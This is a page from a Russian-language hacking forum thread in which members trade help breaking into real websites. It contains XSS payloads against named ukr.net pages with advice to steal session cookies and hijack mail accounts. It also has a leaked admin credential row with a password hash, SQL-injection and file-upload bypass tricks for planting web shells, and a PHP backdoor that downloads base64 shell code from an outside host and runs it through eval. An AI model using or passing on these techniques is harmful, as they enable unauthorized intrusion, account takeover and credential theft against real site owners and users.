Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Fild3y

    Fild3y New Member

    Joined:
    13 Feb 2011
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Помогите разобраться с XSS вот вроде нашел тут токо хз правильная ли она http://play.ukr.net/videos/search? уязвимое поле поиск кода пишу "><script>alert()</script> сам посмотрите что выдаст)). Это XSS ваще? Если да обесните плиз как ее использывать, а то читаю мануалы не оч понял))
     
    1 person likes this.
  2. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    я так и думал. но всё же решил уточнить)
     
  3. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    xss, только там strip_tags херачит
     
  4. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    2.3.x
     
  5. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    admin_id:admin_name:admin_email:admin_pass:admin_level

    1:frandocs:[email protected]:5a042913e5074bc846784dd2066456d2:26:1

    5a042913e5074bc846784dd2066456d2 -> md5
     
  6. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Там как уже сказали фильтр, но в таких ситуациях нельзя разочаровываться, по адресу http://freemail.ukr.net/q/password_recovery есть рабочая XSS
    Code:
    "><script>alert(/xss/)</script>
    Что с этим можно сделать?
    Можно найти более красиваое место, написать там посредством XSS код который будет красть куки, через сниффер, и потом входить на этот сьайт под чужими акками без ввода пароля, ну это в лучшем случае))

    Под красивым местом подразумевается статическая страница которую могут открыть люди и оставить там свои куки для тебя :)

    P.S. Посредством этой XSS можно взломать(угнать куки) любой аккаунт с freemail.ukr.net, вот что можно с этим сделать))
     
    #16486 eclipse, 25 Mar 2011
    Last edited: 25 Mar 2011
  7. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    как сделать select into outfile '/var/www/site/ae.txt' если фильтрируется ' и все это после 400 колонок
     
  8. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    я не труъ хакир, но вроде тут нечего не поделаешь, т.к. при записи, нужно указывать путь к файлу именно в ' '.
    пробуй через двойной запрос.
     
    1 person likes this.
  9. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
  10. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Столкнулся с проблемой в админке есть функция загрузки картинок в галерею, ресайза нет, но добавляется расширение jpeg, и проверяется mime на image, только в одном случае, когда льешь ex.php.jpeg добавляется ex.txt. В галереи отображается картинка как надо, а когда по прямому пути, то исходник картинки+шелла. Может кто сталкивался, как обойти.
    p.s. инклуда нет
     
  11. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Двиг самопис, блок по белому списку.
     
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    А если отправлять с белым разрешением (x3k.jpg), то с каким именем она зальеться на сервер? С таким же, или добавляется еще jpeg o_0 ?

    Попробуй отправить x3k.jpeg.php подделав Content-Type на Image.

    И вот такие названия пробуй:
    x3k.php.blablajpg
    x3k.php%00.jpeg
     
    #16492 Tigger, 26 Mar 2011
    Last edited: 26 Mar 2011
  13. Axel_Ustus

    Axel_Ustus New Member

    Joined:
    4 Jun 2010
    Messages:
    17
    Likes Received:
    4
    Reputations:
    1
    Нуль байт - уж слишком старомодно
    скорее всего защита от такого есть
    даже в самописном движке
     
  14. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Четыре расширения в белом списке gif,jpg,jpeg,png. Льешь jpg>jpg на выходе.
    Подделывал Content-Type на image/jpeg выкинуло ошибку.
    Нижнии два варианта при первоначальном попадании в админку, не помогли
     
  15. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    204
    Likes Received:
    277
    Reputations:
    32
    Жумла
    Права доступа на каталоги
    Можно как-нить шелл залить? >_<
     
  16. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    да, ставиь в пхп модуль (через админку)
    Code:
    if($_SERVER['REMOTE_ADDR']="TVOI_IP_VNESHKA")
    {
    echo(eval(base64_decode(file_get_contents("http://iahacker.ru/TVOI_BASE64_ENKODIROVANII_SHELL.txt"))));
    die();
    }
    
     
  17. Oro4imaru

    Oro4imaru New Member

    Joined:
    17 Jul 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    что делать пробую залить шелл шелл.пшп.джпег но его в постледствие залива переименовывает на какой нить нв3-1.джпег и он не запускается! как обойти или мож я чето не так делаю??
     
  18. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    204
    Likes Received:
    277
    Reputations:
    32
    куда\что именно? модули залить нельзя
     
  19. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Как видишь доступна только папка сессий, которая лежит на уровень выше корня сайта, соответственно, можно попытаться бросить шелл туда, а дальше подцепить его инклудом, или имея полный путь попробовать прочитать файл configuration.php через скулю, в этом файле часто бывают акки фтп, кстати configuration.php доступен для записи?

    P.S. Я уже тоже сталкивался с этим сайтом))))
     
  20. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    204
    Likes Received:
    277
    Reputations:
    32
    недоступен
    кста, помогите добиться ошибки тут http://sfokr.ru
    нужен путь
     
    #16500 A_n_d_r_e_i, 29 Mar 2011
    Last edited: 29 Mar 2011
Thread Status:
Not open for further replies.